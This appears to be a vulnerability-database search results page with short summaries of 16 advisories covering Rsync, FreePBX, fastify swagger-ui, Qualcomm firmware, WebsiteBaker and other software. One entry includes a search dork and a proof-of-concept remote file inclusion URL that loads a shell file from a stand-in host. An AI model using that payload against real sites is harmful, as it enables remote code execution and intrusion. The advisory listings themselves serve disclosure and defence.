16 matches found
SUSE CVE-2026-43619
Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module...
EUVD-2022-37829
Malicious code in bioql PyPI...
CVE-2024-53564
A vulnerability was discovered in FreePBX 17.0.19.17. It does not verify the type of uploaded valid FreePBX module files, allowing high-privilege administrators to insert unwanted files. NOTE: the Supplier's position is that there is no risk beyond what high-privilege administrators are...
Default swagger-ui configuration exposes all files in the module
Impact: The default configuration of @fastify/swagger-ui without baseDir set will lead to all files in the module's directory being exposed via http routes served by the module. Patches: Update to v2.1.0. Workarounds: Use the baseDir option. References: HackerOne report...
Swagger UI Security Vulnerability
Swagger UI is an open source tool that supports visualizing and being able to interact with API resources. A security vulnerability exists in Swagger UI versions prior to v2.1.0, which stems from the default swagger-ui configuration exposing all files in the module...
Qualcomm Chipsets Resource Management Error Vulnerability
Qualcomm Chipsets are a family of chipsets from Qualcomm Incorporated USA. A security vulnerability exists in Qualcomm Chipsets that stems from a double release issue when parsing PKCS15 sim files, resulting in memory corruption in the Modem...
PT-2023-18292 · Qualcomm · Sd205 Firmware +254
Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned in the provided descriptions. Description: The issue is related to memory corruption in a modem, caused by a double free error that occurs while parsing PKCS15 sim files. Recommendations: At the...
CVE-2017-17440
GNU Libextractor 1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted GIF, IT (Impulse Tracker), NSFE, S3M (Scream Tracker 3), SID, or XM (eXtended Module) file, as demonstrated by the EXTRACTOR_xm_extract_method function in...
CVE-2014-9243
Multiple cross-site scripting (XSS) vulnerabilities in WebsiteBaker 2.8.3 allow remote attackers to inject arbitrary web script or HTML via the (1) QUERY_STRING to wb/admin/admintools/tool.php or (2) section_id parameter to edit_module_files.php, (3) news/add_post.php, (4) news/modify_group.php, (5)...
CVE-2014-9243
Multiple cross-site scripting (XSS) vulnerabilities in WebsiteBaker 2.8.3 allow remote attackers to inject arbitrary web script or HTML via the (1) QUERY_STRING to wb/admin/admintools/tool.php or (2) section_id parameter to edit_module_files.php, (3) news/add_post.php, (4) news/modify_group.php, (5)...
Winamp < 5.59 Build 3033 Multiple Vulnerabilities
Binary data 5689.prm...
DEBIAN-CVE-2007-6720
libmikmod 3.1.9 through 3.2.0, as used by MikMod, SDL-mixer, and possibly other products, relies on the channel count of the last loaded song, rather than the currently playing song, for certain playback calculations, which allows user-assisted attackers to cause a denial of service application...
phppm-rfilfi.txt
PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...
iDefense Security Advisory 09.19.07: Multiple Vendor ImageMagick Multiple Denial of Service Vulnerabilities
Multiple Vendor ImageMagick Multiple Denial of Service Vulnerabilities iDefense Security Advisory 09.19.07 http://labs.idefense.com/intelligence/vulnerabilities/ Sep 19, 2007 I. BACKGROUND ImageMagick is a suite of image manipulation tools animate, composite, conjure, convert, display, identify,...
DEBIAN-CVE-2006-4046
Multiple stack-based buffer overflows in Open Cubic Player 2.6.0pre6 and earlier for Windows, and 0.1.10rc5 and earlier on Linux/BSD, allow remote attackers to execute arbitrary code via (1) a large .S3M file handled by the mpLoadS3M function, (2) a crafted .IT file handled by the...
PT-2005-2673 · Postnuke · Postnuke
Name of the Vulnerable Software and Affected Versions: PostNuke versions 0.750 through 0.760RC3 Description: The issue allows remote attackers to obtain sensitive information via direct requests to various files, including theme.php and Xanthia.php in the Xanthia module, multiple files in the...